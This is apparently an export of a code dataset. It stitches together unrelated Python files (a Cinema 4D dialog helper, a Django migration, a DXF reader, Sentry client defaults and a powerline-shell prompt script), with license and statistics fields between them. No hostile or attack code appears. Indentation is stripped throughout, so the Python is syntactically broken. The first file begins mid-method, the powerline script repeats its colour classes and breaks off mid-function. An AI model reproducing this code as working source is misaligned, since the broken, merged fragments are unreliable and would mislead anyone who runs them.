# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT|c4d.SCROLLGROUP_BORDERIN|c4d.SCROLLGROUP_STATUSBAR | c4d.SCROLLGROUP_NOBLIT)
# BFV_SCALEFIT | BFH_SCALEFIT,
# SCROLLGROUP_STATUSBAR | SCROLLGROUP_BORDERIN |
# SCROLLGROUP_NOBLIT
for k,blck in enumerate(bloc["elems"]):
if type(blck) is list :
self.GroupBegin(id=int(k*25),cols=len(blck),title=str(k),
flags=c4d.BFH_SCALEFIT)#c4d.BFH_CENTER)
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
else : #dictionary: multiple line / format dict?
if "0" in blck:
y = self._drawGroup(blck,x,y)
else :
blck["scrolling"] = False
y = self._drawFrame(blck,x,y)
# if self.scrolling:
# self.endBlock()
if bloc["scrolling"]:
self.endBlock()
self.endBlock()
self.endBlock()
# self.LayoutChanged(bloc["id"])
return y
def saveDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.SaveDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def fileDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.LoadDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def waitingCursor(self,toggle):
""" Toggle the mouse cursor appearance from the busy to idle.
@type toggle: Bool
@param toggle: Weither the cursor is busy or idle
"""
if not toggle :
c4d.gui.SetMousePointer(c4d.MOUSE_NORMAL)
else :
c4d.gui.SetMousePointer(c4d.MOUSE_BUSY)
def updateViewer(self):
"""
update the 3d windows if any
"""
c4d.EventAdd()
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW|c4d.DRAWFLAGS_NO_THREAD|c4d.DRAWFLAGS_NO_ANIMATION)
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
def startBlock(self,m=1,n=1):
if m == 0:
m = 1
self.GroupBegin(id=1,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=m, rows=n)
self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
# self.bid+=1
def endBlock(self):
self.GroupEnd()
#self.GroupEnd()
def startLayout(self):
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
grFlag = c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT | c4d.BFV_GRIDGROUP_EQUALROWS
if self.scrolling:
self.ScrollGroupBegin(id=2, flags=grFlag,
scrollflags=c4d.SCROLLGROUP_VERT)
#grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
self.GroupBegin(id=1,flags=grFlag ,cols=1)#initw ?
#self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN)
def endLayout(self):
self.GroupEnd()
if self.scrolling:
self.GroupEnd()
## SCROLLGROUP_VERT Allow the group to scroll vertically.
## SCROLLGROUP_HORIZ Allow the group to scroll horizontally.
## SCROLLGROUP_NOBLIT Always redraw the whole group, not just new areas, when scrolling.
## SCROLLGROUP_LEFT Create the vertical slider to the left.
## SCROLLGROUP_BORDERIN Display a small border around the scroll group.
## SCROLLGROUP_STATUSBAR Create a status bar for the scroll group.
## SCROLLGROUP_AUTOHORIZ Only show horizontal slider if needed.
## SCROLLGROUP_AUTOVERT Only show vertical slider if needed.
## SCROLLGROUP_NOSCROLLER No scroller.
## SCROLLGROUP_NOVGAP No vertical gap.
## SCROLLGROUP_STATUSBAR_EXT_GROUP Creates an extern group within the statusbar.
# if self.scrolling:
# self.ScrollGroupBegin(id=50000, flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
##
# if self.tab:
# self.GroupEnd()#self.Activate(1)#GroupEnd()
#
def getString(self,elem):
""" Return the current string value of the String Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string input value for this specific elem
"""
return self.GetString(elem["id"])
def setString(self,elem,val):
""" Set the current String value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value
"""
self.SetString(elem["id"],val)
def getStringArea(self,elem):
""" Return the current string area value of the String area Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string area input value for this specific elem
"""
return self.GetString(elem["id"])
def setStringArea(self,elem,val):
""" Set the current String area value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value (multiline)
"""
self.SetString(elem["id"],val)
def getReal(self,elem):
""" Return the current Float value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Float
@return: the current Float value input for this specific elem
"""
val = self.GetReal(elem["id"])
#check if its a real actually
if isinstance(val, float):
return val
def setReal(self,elem,val):
""" Set the current Float value of the Float input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Float
@param val: the new Float value
"""
print elem,val
print type(val)
return self.SetReal(elem["id"],float(val))
def getBool(self,elem):
""" Return the current Bool value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Bool
@return: the current Bool value input for this specific elem
"""
return self.GetBool(elem["id"])
def setBool(self,elem,val):
""" Set the current Bool value of the Bool input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Bool
@param val: the new Bool value
"""
return self.SetBool(elem["id"],bool(val))
def getLong(self,elem):
""" Return the current Int value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Int
@return: the current Int value input for this specific elem
"""
val = self.GetLong(elem["id"])
if isinstance(val, int):
return val
def setLong(self,elem,val):
""" Set the current Int value of the Int input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Int
@param val: the new Int value
"""
return self.SetLong(elem["id"],int(val))
def getColor(self,elem):
""" Return the current Color value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Color
@return: the current Color array RGB value input for this specific elem
"""
c4dcol = self.GetColorField(elem["id"])['color']
return [c4dcol.x,c4dcol.y,c4dcol.z]
def setColor(self,elem,val):
""" Set the current Color rgb arrray value of the Color input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Color
@param val: the new Color value
"""
# print "in setColor",elem
c4dcol = self.GetColorField(elem["id"])
# print elem["id"]
c4dcol['color'].x=val[0]
c4dcol['color'].y=val[1]
c4dcol['color'].z=val[2]
self.SetColorField(elem["id"],c4dcol['color'],1.0,1.0,0)
def setAction(self,elem,callback):
elem["action"] = callback
def updateSlider(self,elem,mini,maxi,default,step):
""" Update the state of the given slider, ie format, min, maxi, step
@type elem: dictionary
@param elem: the slider elem dictionary
@type maxi: int/float
@param maxi: max value for the item, ie slider
@type mini: int/float
@param mini: min value for the item, ie slider
@type default: int/float
@param default: default value for the item, ie slider
@type step: int/float
@param step: step value for the item, ie slider
"""
if type(step) is int:
doit = self.SetLong
else :
doit = self.SetReal
doit(elem["id"],default,mini,maxi,step)
@classmethod
def _restore(self,rkey,dkey=None):
"""
Function used to restore the windows data, usefull for plugin
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dkey: string
@param dkey: wiether we want a particular data from the stored dic
"""
if hasattr(c4d,rkey):
obj = c4d.__dict__[rkey]
if dkey is not None:
if c4d.__dict__[rkey].has_key(dkey) :
return c4d.__dict__[rkey][dkey]
else :
return None
return obj
else :
return None
@classmethod
def _store(self,rkey,dict):
"""
Function used to store the windows data, usefull for plugin
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dict: dictionary
@param dict: the storage is done throught a dictionary
"""
c4d.__dict__[rkey]= dict
def drawSubDialog(self,dial,id,callback = None,asynchro = True):
"""
Draw the given subdialog whit his own element and callback
@type dial: dialog Object
@param dial: the dialog object to be draw
@type id: int
@param id: the id of the dialog
@type callback: function
@param callback: the associate callback
"""
print (dial,id,asynchro)
if asynchro :
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=id, defaultw=dial.w, defaulth=dial.h)
else :
dial.Open(c4d.DLG_TYPE_MODAL, pluginid=id, defaultw=dial.w, defaulth=dial.h)
def close(self,*args):
""" Close the windows"""
self.Close()
def display(self):
""" Create and Open the current gui windows """
#how to display it/initialize it ?
self.Open(c4d.DLG_TYPE_ASYNC, pluginid=self.plugid,
defaultw=self.w, defaulth=self.h)
def getDirectory(self):
"""return software directory for script and preferences"""
prefpath=c4d.storage.GeGetC4DPath(1)
os.chdir(prefpath)
os.chdir(".."+os.sep)
self.prefdir = os.path.abspath(os.curdir)
if sys.platform == "darwin" :
self.softdir = c4d.storage.GeGetC4DPath(4)
elif sys.platform == "win32":
self.softdir = c4d.storage.GeGetC4DPath(2)
class c4dUIDialog(c4dUI,uiAdaptor):
def __init__(self,**kw):
if kw.has_key("title"):
self.title= kw["title"]
self._setTitle(self.title)
#class c4dUISubDialog(c4dUI,uiAdaptor):
# def __init__(self,):
# c4dUIDialog.__init__(self,)
#
###############WIDGET####################################
import time
class TimerDialog(c4d.gui.SubDialog):
"""
Timer dialog for c4d, wait time for user input.
from Pmv.hostappInterface.cinema4d_dev import helperC4D as helper
dial = helper.TimerDialog()
dial.cutoff = 30.0
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=3555550, defaultw=250, defaulth=100)
"""
def init(self):
self.startingTime = time.time()
self.dT = 0.0
self._cancel = False
self.SetTimer(100) #miliseconds
#self.cutoff = ctime #seconds
#self.T = int(ctime)
def initWidgetId(self):
id = 1000
self.BTN = {"No":{"id":id,"name":"No",'width':50,"height":10,
"action":self.continueFill},
"Yes":{"id":id+1,"name":"Yes",'width':50,"height":10,
"action":self.stopFill},
}
id += len(self.BTN)
self.LABEL_ID = [{"id":id,"label":"Did you want to Cancel the Job:"},
{"id":id+1,"label":str(self.cutoff) } ]
id += len(self.LABEL_ID)
return True
def CreateLayout(self):
ID = 1
self.SetTitle("Cancel?")
self.initWidgetId()
#minimize otin/button
self.GroupBegin(id=ID,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=2, rows=10)
self.GroupBorderSpace(10, 10, 5, 10)
ID +=1
self.AddStaticText(self.LABEL_ID[0]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[0]["id"],self.LABEL_ID[0]["label"])
self.AddStaticText(self.LABEL_ID[1]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[1]["id"],self.LABEL_ID[1]["label"])
ID +=1
for key in self.BTN.keys():
self.AddButton(id=self.BTN[key]["id"], flags=c4d.BFH_LEFT | c4d.BFV_MASK,
initw=self.BTN[key]["width"],
inith=self.BTN[key]["height"],
name=self.BTN[key]["name"])
self.init()
return True
def open(self):
self.Open(c4d.DLG_TYPE_MODAL, pluginid=25555589, defaultw=120, defaulth=100)
def Timer(self,val):
#print val val seem to be the gadget itself ?
#use to se if the user answer or not...like of nothing after x ms
#close the dialog
# self.T -= 1.0
curent_time = time.time()
self.dT = curent_time - self.startingTime
# print self.dT, self.T
self.SetString(self.LABEL_ID[1]["id"],str(self.cutoff-self.dT ))
if self.dT > self.cutoff :
self.continueFill()
def stopFill(self):
self._cancel = True
self.Close()
def continueFill(self):
self._cancel = False
self.Close()
def Command(self, id, msg):
for butn in self.BTN.keys():
if id == self.BTN[butn]["id"]:
self.BTN[butn]["action"]()
return True
|
gpl-3.0
| 645,004,486,327,748,500
| 37.44592
| 142
| 0.540422
| false
| 3.691201
| false
| false
| false
|
tdfischer/organizer
|
crm/migrations/0001_initial.py
|
1
|
1152
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-07-27 07:36
from __future__ import unicode_literals
import address.models
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('address', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('email', models.CharField(max_length=200)),
('created', models.DateTimeField(auto_now_add=True)),
('address', address.models.AddressField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='address.Address')),
('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
),
]
|
agpl-3.0
| 8,889,659,258,526,600,000
| 35
| 170
| 0.615451
| false
| 3.972414
| false
| false
| false
|
JohnyEngine/CNC
|
deprecated/heekspython/examples/dxfReader.py
|
1
|
11845
|
"""This module provides a function for reading dxf files and parsing them into a useful tree of objects and data.
The convert function is called by the readDXF fuction to convert dxf strings into the correct data based
on their type code. readDXF expects a (full path) file name as input.
"""
# --------------------------------------------------------------------------
# DXF Reader v0.9 by Ed Blake (AKA Kitsu)
# 2008.05.08 modif.def convert() by Remigiusz Fiedler (AKA migius)
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
from dxfImportObjects import *
class Object:
"""Empty container class for dxf objects"""
def __init__(self, _type='', block=False):
"""_type expects a string value."""
self.type = _type
self.name = ''
self.data = []
def __str__(self):
if self.name:
return self.name
else:
return self.type
def __repr__(self):
return str(self.data)
def get_type(self, kind=''):
"""Despite the name, this method actually returns all objects of type 'kind' from self.data."""
if type:
objects = []
for item in self.data:
if type(item) != list and item.type == kind:
# we want this type of object
objects.append(item)
elif type(item) == list and item[0] == kind:
# we want this type of data
objects.append(item[1])
return objects
class InitializationError(Exception): pass
class StateMachine:
"""(finite) State Machine from the great David Mertz's great Charming Python article."""
def __init__(self):
self.handlers = []
self.startState = None
self.endStates = []
def add_state(self, handler, end_state=0):
"""All states and handlers are functions which return
a state and a cargo."""
self.handlers.append(handler)
if end_state:
self.endStates.append(handler)
def set_start(self, handler):
"""Sets the starting handler function."""
self.startState = handler
def run(self, cargo=None):
if not self.startState:
raise InitializationError,\
"must call .set_start() before .run()"
if not self.endStates:
raise InitializationError, \
"at least one state must be an end_state"
handler = self.startState
while 1:
(newState, cargo) = handler(cargo)
#print cargo
if newState in self.endStates:
return newState(cargo)
#break
elif newState not in self.handlers:
raise RuntimeError, "Invalid target %s" % newState
else:
handler = newState
def get_name(data):
"""Get the name of an object from its object data.
Returns a pair of (data_item, name) where data_item is the list entry where the name was found
(the data_item can be used to remove the entry from the object data). Be sure to check
name not None before using the returned values!
"""
value = None
for item in data:
if item[0] == 2:
value = item[1]
break
return item, value
def get_layer(data):
"""Expects object data as input.
Returns (entry, layer_name) where entry is the data item that provided the layer name.
"""
value = None
for item in data:
if item[0] == 8:
value = item[1]
break
return item, value
def convert(code, value):
"""Convert a string to the correct Python type based on its dxf code.
code types:
ints = 60-79, 170-179, 270-289, 370-389, 400-409, 1060-1070
longs = 90-99, 420-429, 440-459, 1071
floats = 10-39, 40-59, 110-139, 140-149, 210-239, 460-469, 1010-1059
hex = 105, 310-379, 390-399
strings = 0-9, 100, 102, 300-309, 410-419, 430-439, 470-479, 999, 1000-1009
"""
if 59 < code < 80 or 169 < code < 180 or 269 < code < 290 or 369 < code < 390 or 399 < code < 410 or 1059 < code < 1071:
value = int(float(value))
elif 89 < code < 100 or 419 < code < 430 or 439 < code < 460 or code == 1071:
value = long(float(value))
elif 9 < code < 60 or 109 < code < 150 or 209 < code < 240 or 459 < code < 470 or 1009 < code < 1060:
value = float(value)
elif code == 105 or 309 < code < 380 or 389 < code < 400:
value = int(value, 16) # should be left as string?
else: # it's already a string so do nothing
pass
return value
def findObject(infile, kind=''):
"""Finds the next occurance of an object."""
obj = False
while 1:
line = infile.readline()
if not line: # readline returns '' at eof
return False
if not obj: # We're still looking for our object code
if line.lower().strip() == '0':
obj = True # found it
else: # we are in an object definition
if kind: # if we're looking for a particular kind
if line.lower().strip() == kind:
obj = Object(line.lower().strip())
break
else: # otherwise take anything non-numeric
if line.lower().strip() not in string.digits:
obj = Object(line.lower().strip())
break
obj = False # whether we found one or not it's time to start over
return obj
def handleObject(infile):
"""Add data to an object until end of object is found."""
line = infile.readline()
if line.lower().strip() == 'section':
return 'section' # this would be a problem
elif line.lower().strip() == 'endsec':
return 'endsec' # this means we are done with a section
else: # add data to the object until we find a new object
obj = Object(line.lower().strip())
obj.name = obj.type
done = False
data = []
while not done:
line = infile.readline()
if not data:
if line.lower().strip() == '0':
#we've found an object, time to return
return obj
else:
# first part is always an int
data.append(int(line.lower().strip()))
else:
data.append(convert(data[0], line.strip()))
obj.data.append(data)
data = []
def handleTable(table, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(table.data)
if name: # We should always find a name
table.data.remove(item)
table.name = name.lower()
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'table':
print "Warning: previous table not closed!"
return table
elif obj.type == 'endtab':
return table # this means we are done with the table
else: # add objects to the table until one of the above is found
table.data.append(obj)
def handleBlock(block, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(block.data)
if name: # We should always find a name
block.data.remove(item)
block.name = name
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'block':
print "Warning: previous block not closed!"
return block
elif obj.type == 'endblk':
return block # this means we are done with the table
else: # add objects to the table until one of the above is found
block.data.append(obj)
"""These are the states/functions used in the State Machine.
states:
start - find first section
start_section - add data, find first object
object - add obj-data, watch for next obj (called directly by start_section)
end_section - look for next section or eof
end - return results
"""
def start(cargo):
"""Expects the infile as cargo, initializes the cargo."""
#print "Entering start state!"
infile = cargo
drawing = Object('drawing')
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return error, (infile, "Failed to find any sections!")
def start_section(cargo):
"""Expects [infile, drawing, section] as cargo, builds a nested section object."""
#print "Entering start_section state!"
infile = cargo[0]
drawing = cargo[1]
section = cargo[2]
# read each line, if it is an object declaration go to object mode
# otherwise create a [index, data] pair and add it to the sections data.
done = False
data = []
while not done:
line = infile.readline()
if not data: # if we haven't found a dxf code yet
if line.lower().strip() == '0':
# we've found an object
while 1: # no way out unless we find an end section or a new section
obj = handleObject(infile)
if obj == 'section': # shouldn't happen
print "Warning: failed to close previous section!"
return end_section, (infile, drawing)
elif obj == 'endsec': # This section is over, look for the next
drawing.data.append(section)
return end_section, (infile, drawing)
elif obj.type == 'table': # tables are collections of data
obj = handleTable(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
elif obj.type == 'block': # the same is true of blocks
obj = handleBlock(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
else: # found another sub-object
section.data.append(obj)
else:
data.append(int(line.lower().strip()))
else: # we have our code, now we just need to convert the data and add it to our list.
data.append(convert(data[0], line.strip()))
section.data.append(data)
data = []
def end_section(cargo):
"""Expects (infile, drawing) as cargo, searches for next section."""
#print "Entering end_section state!"
infile = cargo[0]
drawing = cargo[1]
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return end, (infile, drawing)
def end(cargo):
"""Expects (infile, drawing) as cargo, called when eof has been reached."""
#print "Entering end state!"
infile = cargo[0]
drawing = cargo[1]
#infile.close()
return drawing
def error(cargo):
"""Expects a (infile, string) as cargo, called when there is an error during processing."""
#print "Entering error state!"
infile = cargo[0]
err = cargo[1]
infile.close()
print "There has been an error:"
print err
return False
def readDXF(filename):
"""Given a file name try to read it as a dxf file.
Output is an object with the following structure
drawing
header
header data
classes
class data
tables
table data
blocks
block data
entities
entity data
objects
object data
where foo data is a list of sub-objects. True object data
is of the form [code, data].
"""
infile = open(filename)
sm = StateMachine()
sm.add_state(error, True)
sm.add_state(end, True)
sm.add_state(start_section)
sm.add_state(end_section)
sm.add_state(start)
sm.set_start(start)
try:
drawing = sm.run(infile)
if drawing:
drawing.name = filename
for obj in drawing.data:
item, name = get_name(obj.data)
if name:
obj.data.remove(item)
obj.name = name.lower()
setattr(drawing, name.lower(), obj)
# Call the objectify function to cast
# raw objects into the right types of object
obj.data = objectify(obj.data)
#print obj.name
finally:
infile.close()
return drawing
if __name__ == "__main__":
filename = r".\examples\block-test.dxf"
drawing = readDXF(filename)
for item in drawing.entities.data:
print item
|
apache-2.0
| -6,728,610,616,327,599,000
| 30.089239
| 121
| 0.668383
| false
| 3.310509
| false
| false
| false
|
mtrdesign/pylogwatch
|
pylogwatch/raven/conf/defaults.py
|
1
|
2071
|
"""
raven.conf.defaults
~~~~~~~~~~~~~~~~~~~
Represents the default values for all Sentry settings.
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import os.path
import socket
ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
# Allow local testing of Sentry even if DEBUG is enabled
DEBUG = False
# This should be the full URL to sentries store view
SERVERS = None
TIMEOUT = 5
# TODO: this is specific to Django
CLIENT = 'raven.contrib.django.DjangoClient'
# Not all environments have access to socket module, for example Google App Engine
# Need to check to see if the socket module has ``gethostname``, if it doesn't we
# will set it to None and require it passed in to ``Client`` on initializtion.
NAME = socket.gethostname() if hasattr(socket, 'gethostname') else None
# Superuser key -- will be used if set, otherwise defers to
# SECRET_KEY and PUBLIC_KEY
KEY = None
# Credentials to authenticate with the Sentry server
SECRET_KEY = None
PUBLIC_KEY = None
# We allow setting the site name either by explicitly setting it with the
# SENTRY_SITE setting, or using the django.contrib.sites framework for
# fetching the current site. Since we can't reliably query the database
# from this module, the specific logic is within the SiteFilter
SITE = None
# Extending this allow you to ignore module prefixes when we attempt to
# discover which function an error comes from (typically a view)
EXCLUDE_PATHS = []
# By default Sentry only looks at modules in INSTALLED_APPS for drilling down
# where an exception is located
INCLUDE_PATHS = []
# The maximum number of elements to store for a list-like structure.
MAX_LENGTH_LIST = 50
# The maximum length to store of a string-like structure.
MAX_LENGTH_STRING = 400
# Automatically log frame stacks from all ``logging`` messages.
AUTO_LOG_STACKS = False
# Client-side data processors to apply
PROCESSORS = (
'raven.processors.SanitizePasswordsProcessor',
)
# Default Project ID
PROJECT = 1
|
gpl-3.0
| -8,137,903,970,246,429,000
| 28.585714
| 82
| 0.750845
| false
| 3.8
| false
| false
| false
|
LeonardoGentile/powerline-shell
|
powerline-shell.old.py
|
1
|
15940
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
import sys
def warn(msg):
print '[powerline-bash] ', msg
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg, separator or self.separator,
separator_fg or bg))
def draw(self):
return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset).encode('utf-8')
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0],
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
try:
cwd = os.getcwd()
except:
cwd = os.getenv('PWD') # This is where the OS thinks we are
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
try:
os.chdir(up)
except:
warn("Your current directory is invalid.")
sys.exit(1)
warn("Your current directory is invalid. Lowest valid directory: " + up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-only', action='store_true',
help='Only show the current directory')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd())
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
import os
def add_virtual_env_segment():
env = os.getenv('VIRTUAL_ENV')
if env is None:
return
env_name = os.path.basename(env)
bg = Color.VIRTUAL_ENV_BG
fg = Color.VIRTUAL_ENV_FG
powerline.append(' %s ' % env_name, fg, bg)
add_virtual_env_segment()
def add_username_segment():
import os
if powerline.args.shell == 'bash':
user_prompt = ' \\u '
elif powerline.args.shell == 'zsh':
user_prompt = ' %n '
else:
user_prompt = ' %s ' % os.getenv('USER')
if os.getenv('USER') == 'root':
bgcolor = Color.USERNAME_ROOT_BG
else:
bgcolor = Color.USERNAME_BG
powerline.append(user_prompt, Color.USERNAME_FG, bgcolor)
add_username_segment()
def add_hostname_segment():
if powerline.args.colorize_hostname:
from lib.color_compliment import stringToHashToColorAndOpposite
from lib.colortrans import rgb2short
from socket import gethostname
hostname = gethostname()
FG, BG = stringToHashToColorAndOpposite(hostname)
FG, BG = (rgb2short(*color) for color in [FG, BG])
host_prompt = ' %s' % hostname.split('.')[0]
powerline.append(host_prompt, FG, BG)
else:
if powerline.args.shell == 'bash':
host_prompt = ' \\h '
elif powerline.args.shell == 'zsh':
host_prompt = ' %m '
else:
import socket
host_prompt = ' %s ' % socket.gethostname().split('.')[0]
powerline.append(host_prompt, Color.HOSTNAME_FG, Color.HOSTNAME_BG)
add_hostname_segment()
import os
def add_ssh_segment():
if os.getenv('SSH_CLIENT'):
powerline.append(' %s ' % powerline.network, Color.SSH_FG, Color.SSH_BG)
add_ssh_segment()
import os
def get_short_path(cwd):
home = os.getenv('HOME')
names = cwd.split(os.sep)
if names[0] == '': names = names[1:]
path = ''
for i in range(len(names)):
